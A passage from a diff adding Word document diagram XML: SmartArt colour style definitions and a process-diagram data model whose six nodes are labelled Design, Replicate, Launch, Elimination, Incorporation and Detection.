+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="solidFgAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="solidAlignAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="solidBgAcc1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAccFollowNode1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:alpha val="90000"/>
+        <a:tint val="40000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:alpha val="90000"/>
+        <a:tint val="40000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="alignAccFollowNode1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:alpha val="90000"/>
+        <a:tint val="40000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:alpha val="90000"/>
+        <a:tint val="40000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgAccFollowNode1">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:alpha val="90000"/>
+        <a:tint val="40000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:alpha val="90000"/>
+        <a:tint val="40000"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc0">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc2">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc3">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgAcc4">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="90000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="bgShp">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="40000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="dkBgShp">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:shade val="80000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="trBgShp">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="50000"/>
+        <a:alpha val="40000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="accent1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="fgShp">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="accent1">
+        <a:tint val="60000"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="lt1"/>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="dk1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+  <dgm:styleLbl name="revTx">
+    <dgm:fillClrLst meth="repeat">
+      <a:schemeClr val="lt1">
+        <a:alpha val="0"/>
+      </a:schemeClr>
+    </dgm:fillClrLst>
+    <dgm:linClrLst meth="repeat">
+      <a:schemeClr val="dk1">
+        <a:alpha val="0"/>
+      </a:schemeClr>
+    </dgm:linClrLst>
+    <dgm:effectClrLst/>
+    <dgm:txLinClrLst/>
+    <dgm:txFillClrLst meth="repeat">
+      <a:schemeClr val="tx1"/>
+    </dgm:txFillClrLst>
+    <dgm:txEffectClrLst/>
+  </dgm:styleLbl>
+</dgm:colorsDef>
+</file>
+
+<file path=word/diagrams/data1.xml><?xml version="1.0" encoding="utf-8"?>
+<dgm:dataModel xmlns:dgm="http://schemas.openxmlformats.org/drawingml/2006/diagram" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+  <dgm:ptLst>
+    <dgm:pt modelId="{800A34D2-1435-4CE2-8456-575B7A978800}" type="doc">
+      <dgm:prSet loTypeId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2" loCatId="process" qsTypeId="urn:microsoft.com/office/officeart/2005/8/quickstyle/simple1" qsCatId="simple" csTypeId="urn:microsoft.com/office/officeart/2005/8/colors/accent1_2" csCatId="accent1" phldr="1"/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{32CAB45C-5504-43F4-BD0B-E6BB848F8D66}">
+      <dgm:prSet phldrT="[Text]"/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:r>
+            <a:rPr lang="en-US"/>
+            <a:t>Design</a:t>
+          </a:r>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{9C05AF5C-CDE0-43AE-9BED-56190A1ACA39}" type="parTrans" cxnId="{80DF7148-510E-423F-B1BF-8A9AB678D83F}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{32681F8D-9D8E-4727-8479-EA7057C17516}" type="sibTrans" cxnId="{80DF7148-510E-423F-B1BF-8A9AB678D83F}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}">
+      <dgm:prSet phldrT="[Text]" custT="1"/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:r>
+            <a:rPr lang="en-US" sz="1400"/>
+            <a:t>Replicate</a:t>
+          </a:r>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{6E833E8A-ECFE-46DD-9A2A-D9137EEE1861}" type="parTrans" cxnId="{465C3C91-310C-4389-9905-886A523BFDD2}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{9534400A-60B4-4180-B3F1-AFD424AE68CE}" type="sibTrans" cxnId="{465C3C91-310C-4389-9905-886A523BFDD2}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{0F52D196-7939-437B-91DB-B98A69237BEA}">
+      <dgm:prSet phldrT="[Text]" custT="1"/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:r>
+            <a:rPr lang="en-US" sz="1050"/>
+            <a:t>Launch</a:t>
+          </a:r>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{8F579DCE-252A-4A5C-9495-8F8EF3C457FD}" type="parTrans" cxnId="{1B653A82-DB30-4E93-A703-8508EED38314}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{DB71D523-8951-4851-923D-2052681B332D}" type="sibTrans" cxnId="{1B653A82-DB30-4E93-A703-8508EED38314}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}">
+      <dgm:prSet phldrT="[Text]" custT="1"/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:r>
+            <a:rPr lang="en-US" sz="1400"/>
+            <a:t>Elimination</a:t>
+          </a:r>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{4FC15035-1A71-4D3E-9CF2-F06F363DA0C5}" type="parTrans" cxnId="{35CE8993-3475-4AD7-93AD-B54442062324}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{E95CE5FF-4FBA-40D2-829D-54F564B6BF8E}" type="sibTrans" cxnId="{35CE8993-3475-4AD7-93AD-B54442062324}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}">
+      <dgm:prSet phldrT="[Text]" custT="1"/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:r>
+            <a:rPr lang="en-US" sz="1200"/>
+            <a:t>Incorporation</a:t>
+          </a:r>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{0C181FBC-D6D8-47F2-8244-A9E3D3617E02}" type="parTrans" cxnId="{2C5006B0-B4E7-447C-9966-D92384563C5E}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{698CB340-EE48-4490-B29F-F4E0DBB05DFC}" type="sibTrans" cxnId="{2C5006B0-B4E7-447C-9966-D92384563C5E}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{B170CED5-068A-4D1F-8945-28B6D2132492}">
+      <dgm:prSet phldrT="[Text]"/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:r>
+            <a:rPr lang="en-US"/>
+            <a:t>Detection</a:t>
+          </a:r>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{B67B0641-A829-4A88-AF0E-D8E864CFA7D6}" type="parTrans" cxnId="{A8080488-8FA8-4162-93FB-472F154655EE}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{590B5E45-022F-4210-BB27-53893B327DCF}" type="sibTrans" cxnId="{A8080488-8FA8-4162-93FB-472F154655EE}">
+      <dgm:prSet/>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{289C4758-43B3-45D3-9BD4-1253118A7416}" type="pres">
+      <dgm:prSet presAssocID="{800A34D2-1435-4CE2-8456-575B7A978800}" presName="diagram" presStyleCnt="0">
+        <dgm:presLayoutVars>
+          <dgm:dir/>
+          <dgm:resizeHandles/>
+        </dgm:presLayoutVars>
+      </dgm:prSet>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{DA789D76-2ED8-45A2-981D-3BD7CFC38014}" type="pres">
+      <dgm:prSet presAssocID="{32CAB45C-5504-43F4-BD0B-E6BB848F8D66}" presName="firstNode" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6" custScaleX="77428" custScaleY="77607">
+        <dgm:presLayoutVars>
+          <dgm:bulletEnabled val="1"/>
+        </dgm:presLayoutVars>
+      </dgm:prSet>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{220F6836-5000-4BC1-8FE8-9539F8D4CCDC}" type="pres">
+      <dgm:prSet presAssocID="{32681F8D-9D8E-4727-8479-EA7057C17516}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="0" presStyleCnt="5"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{9AEC3832-438D-4221-B6E6-1F413B84BB9D}" type="pres">
+      <dgm:prSet presAssocID="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}" presName="middleNode" presStyleCnt="0"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{BCB2D286-31D5-48BB-BE52-B614B11118CB}" type="pres">
+      <dgm:prSet presAssocID="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}" presName="padding" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="6"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{541895FD-52F7-4D93-8303-FC10E12608E1}" type="pres">
+      <dgm:prSet presAssocID="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}" presName="shape" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6" custScaleX="166242" custScaleY="157370" custLinFactNeighborX="-231">
+        <dgm:presLayoutVars>
+          <dgm:bulletEnabled val="1"/>
+        </dgm:presLayoutVars>
+      </dgm:prSet>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{66F318BB-222F-4159-A34F-C52A62A28F62}" type="pres">
+      <dgm:prSet presAssocID="{9534400A-60B4-4180-B3F1-AFD424AE68CE}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="1" presStyleCnt="5"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{FB7E4BC7-26C6-4F90-BB14-059544BB36D5}" type="pres">
+      <dgm:prSet presAssocID="{0F52D196-7939-437B-91DB-B98A69237BEA}" presName="middleNode" presStyleCnt="0"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{BC00D9AE-F964-4CFF-A842-A82AB27A6F8B}" type="pres">
+      <dgm:prSet presAssocID="{0F52D196-7939-437B-91DB-B98A69237BEA}" presName="padding" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="6"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{50C454E7-BA89-4F9E-91A0-7821EAC680BD}" type="pres">
+      <dgm:prSet presAssocID="{0F52D196-7939-437B-91DB-B98A69237BEA}" presName="shape" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6">
+        <dgm:presLayoutVars>
+          <dgm:bulletEnabled val="1"/>
+        </dgm:presLayoutVars>
+      </dgm:prSet>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{A120EEDA-63B5-4BF5-B2C4-813ACBA210CA}" type="pres">
+      <dgm:prSet presAssocID="{DB71D523-8951-4851-923D-2052681B332D}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="2" presStyleCnt="5"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{4FDC543E-C148-4881-AD9F-47C07A971BBA}" type="pres">
+      <dgm:prSet presAssocID="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}" presName="middleNode" presStyleCnt="0"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{41522627-5F3E-4344-9647-BB447D6B2372}" type="pres">
+      <dgm:prSet presAssocID="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}" presName="padding" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="6"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{3DD4A119-987F-4511-B596-34C99B57CEAD}" type="pres">
+      <dgm:prSet presAssocID="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}" presName="shape" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6" custScaleX="155165" custScaleY="141023">
+        <dgm:presLayoutVars>
+          <dgm:bulletEnabled val="1"/>
+        </dgm:presLayoutVars>
+      </dgm:prSet>
+      <dgm:spPr/>
+      <dgm:t>
+        <a:bodyPr/>
+        <a:lstStyle/>
+        <a:p>
+          <a:endParaRPr lang="en-US"/>
+        </a:p>
+      </dgm:t>
+    </dgm:pt>
+    <dgm:pt modelId="{FB9DD9DF-E856-4125-B7F2-5FFADD10B34B}" type="pres">
+      <dgm:prSet presAssocID="{E95CE5FF-4FBA-40D2-829D-54F564B6BF8E}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="3" presStyleCnt="5"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{50CF3BBF-AEA7-45B5-9AEB-E6312F6A7282}" type="pres">
+      <dgm:prSet presAssocID="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}" presName="middleNode" presStyleCnt="0"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{50FD5A12-340B-4260-99AB-E52AFDDE90EC}" type="pres">
+      <dgm:prSet presAssocID="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}" presName="padding" presStyleLbl="node1" presStyleIdx="3" presStyleCnt="6"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{727D758E-B907-4E65-BC04-2F667812EB65}" type="pres">
+      <dgm:prSet presAssocID="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}" presName="shape" presStyleLbl="node1" presStyleIdx="4" presStyleCnt="6" custScaleX="141133" custScaleY="136433">
+        <dgm:presLayoutVars>
+          <dgm:bulletEnabled val="1"/>
+        </dgm:presLayoutVars>
+      </dgm:prSet>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{5922692C-701D-4F11-A7C8-902588B2087C}" type="pres">
+      <dgm:prSet presAssocID="{698CB340-EE48-4490-B29F-F4E0DBB05DFC}" presName="sibTrans" presStyleLbl="sibTrans2D1" presStyleIdx="4" presStyleCnt="5"/>
+      <dgm:spPr/>
+    </dgm:pt>
+    <dgm:pt modelId="{61C3E4CA-7425-476B-AD9D-D5AB86098096}" type="pres">
+      <dgm:prSet presAssocID="{B170CED5-068A-4D1F-8945-28B6D2132492}" presName="lastNode" presStyleLbl="node1" presStyleIdx="5" presStyleCnt="6" custScaleX="89817" custScaleY="87496">
+        <dgm:presLayoutVars>
+          <dgm:bulletEnabled val="1"/>
+        </dgm:presLayoutVars>
+      </dgm:prSet>
+      <dgm:spPr/>
+    </dgm:pt>
+  </dgm:ptLst>
+  <dgm:cxnLst>
+    <dgm:cxn modelId="{2C5006B0-B4E7-447C-9966-D92384563C5E}" srcId="{800A34D2-1435-4CE2-8456-575B7A978800}" destId="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}" srcOrd="4" destOrd="0" parTransId="{0C181FBC-D6D8-47F2-8244-A9E3D3617E02}" sibTransId="{698CB340-EE48-4490-B29F-F4E0DBB05DFC}"/>
+    <dgm:cxn modelId="{465C3C91-310C-4389-9905-886A523BFDD2}" srcId="{800A34D2-1435-4CE2-8456-575B7A978800}" destId="{DB6C199B-2444-4A39-89D8-D62BE1923D5A}" srcOrd="1" destOrd="0" parTransId="{6E833E8A-ECFE-46DD-9A2A-D9137EEE1861}" sibTransId="{9534400A-60B4-4180-B3F1-AFD424AE68CE}"/>
+    <dgm:cxn modelId="{AC77C259-7F2C-4F79-87A2-9BC150CA5BC5}" type="presOf" srcId="{E95CE5FF-4FBA-40D2-829D-54F564B6BF8E}" destId="{FB9DD9DF-E856-4125-B7F2-5FFADD10B34B}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{22F50684-AD18-42DE-A7FC-4B95A2C4D6DE}" type="presOf" srcId="{32CAB45C-5504-43F4-BD0B-E6BB848F8D66}" destId="{DA789D76-2ED8-45A2-981D-3BD7CFC38014}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{ADA3960B-A858-4C30-91D7-A85E6D6FD165}" type="presOf" srcId="{E13AA509-F635-4BD3-8E3D-1AE8A3F13742}" destId="{727D758E-B907-4E65-BC04-2F667812EB65}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{02DE626F-4774-46A1-A3B6-80172B1DBEB8}" type="presOf" srcId="{698CB340-EE48-4490-B29F-F4E0DBB05DFC}" destId="{5922692C-701D-4F11-A7C8-902588B2087C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{80DF7148-510E-423F-B1BF-8A9AB678D83F}" srcId="{800A34D2-1435-4CE2-8456-575B7A978800}" destId="{32CAB45C-5504-43F4-BD0B-E6BB848F8D66}" srcOrd="0" destOrd="0" parTransId="{9C05AF5C-CDE0-43AE-9BED-56190A1ACA39}" sibTransId="{32681F8D-9D8E-4727-8479-EA7057C17516}"/>
+    <dgm:cxn modelId="{35CE8993-3475-4AD7-93AD-B54442062324}" srcId="{800A34D2-1435-4CE2-8456-575B7A978800}" destId="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}" srcOrd="3" destOrd="0" parTransId="{4FC15035-1A71-4D3E-9CF2-F06F363DA0C5}" sibTransId="{E95CE5FF-4FBA-40D2-829D-54F564B6BF8E}"/>
+    <dgm:cxn modelId="{60FB875D-A610-4BF4-985C-0B1F74D7BE94}" type="presOf" srcId="{800A34D2-1435-4CE2-8456-575B7A978800}" destId="{289C4758-43B3-45D3-9BD4-1253118A7416}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{3887AE11-B6C3-4AFB-8F77-F72CB5590FB2}" type="presOf" srcId="{73C8B386-D87A-40C5-BFB8-16DDFACC7052}" destId="{3DD4A119-987F-4511-B596-34C99B57CEAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{A8080488-8FA8-4162-93FB-472F154655EE}" srcId="{800A34D2-1435-4CE2-8456-575B7A978800}" destId="{B170CED5-068A-4D1F-8945-28B6D2132492}" srcOrd="5" destOrd="0" parTransId="{B67B0641-A829-4A88-AF0E-D8E864CFA7D6}" sibTransId="{590B5E45-022F-4210-BB27-53893B327DCF}"/>
+    <dgm:cxn modelId="{1334C568-D058-4EE2-BD26-1BCB1AB39929}" type="presOf" srcId="{DB71D523-8951-4851-923D-2052681B332D}" destId="{A120EEDA-63B5-4BF5-B2C4-813ACBA210CA}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{58E75C50-770C-4207-92F2-CFC7B2ED77BB}" type="presOf" srcId="{9534400A-60B4-4180-B3F1-AFD424AE68CE}" destId="{66F318BB-222F-4159-A34F-C52A62A28F62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/bProcess2"/>
+    <dgm:cxn modelId="{1B653A82-DB30-4E93-A703-8508EED38314}" srcId="{800A34D2-1435-4CE2-8456-575B7A978800}" destId="{0F52D196-7939-437B-91DB-B98A69237BEA}" srcOrd="2" destOrd="0" parTransId="{8F579DCE-252A-4A5C-9495-8F8EF3C457FD}" sibTransId="{DB71D523-8951-4851-923D-2052681B332D}"/>
